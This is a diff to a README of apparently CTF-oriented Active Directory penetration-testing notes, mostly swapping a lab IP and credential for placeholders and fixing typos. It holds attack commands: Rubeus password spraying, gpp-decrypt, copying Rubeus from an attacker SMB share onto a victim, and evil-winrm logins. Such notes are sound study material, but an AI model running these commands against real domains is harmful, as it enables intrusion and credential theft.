seeu-inspace/easyg/active-directory/README.md

   - Verify the success of the command with `Get-NetGroup "<group>" | select member`
   - Delete the `<user>` with `/del` instead of `/add`
 - Use `gpp-decrypt` to decrypt a given GPP encrypted string
-- Note `ActiveDirectoryRights` and `SecurityIdentifier` for each object enumerated during [Object Permissions Enumeration](#bbject-permissions-enumeration)
+- Note `ActiveDirectoryRights` and `SecurityIdentifier` for each object enumerated during [Object Permissions Enumeration](#object-permissions-enumeration)
   - See: [ActiveDirectoryRights Enum (System.DirectoryServices)](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
 - If you get lost, check also the notes for the Hutch, Heist, and Vault machines
 - File config for responder: `/usr/share/responder/Responder.conf`
 - Do password spray only on local account
   - `Rubeus.exe brute /password:Password1 /noticket`
     - Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file
-    - `echo 10.10.187.139 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts`
+    - `echo <DC_IP> CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts`
 - Kerberos Abuse: https://blog.spookysec.net/kerberos-abuse/
 - To transfer files use smbserver: `sudo impacket-smbserver -smb2support share /home/kali/Downloads/`
   - An example: from PowerShell of the victim, download Rubeus.exe with the command `Copy-Item -Path "\\<kali_IP>\share\Rubeus.exe" -Destination "C:\Users\username\Desktop"`
 - Certificate signing request for WinRM: https://0xdf.gitlab.io/2019/06/01/htb-sizzle.html
   - WinRM shell: https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb
 - NTLM Auth: https://0xdf.gitlab.io/2019/06/01/htb-sizzle.html#beyond-root---ntlm-auth
 - Not all the usernames found are always the ones that work.
-For example: you might find autologon creds `svc_loanmanager:Moneymakestheworldgoround!` which however lead to login with `evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'`
+For example: you might find autologon creds `<SVC_USER>:<PASSWORD>` which however lead to login with `evil-winrm -i <DC_IP> -u <ACTUAL_USERNAME> -p '<PASSWORD>'`
 - Every time that you think about Active Directory, think about a Forest, not a Domain.
 If one domain is compromised, so it is the entire forest.
-Whithin a forest, all the domains trust each others.
-This is why a forest is considered a security boundry.
+Within a forest, all the domains trust each other.
+This is why a forest is considered a security boundary.

 **Commands frequently used**
 ```PowerShell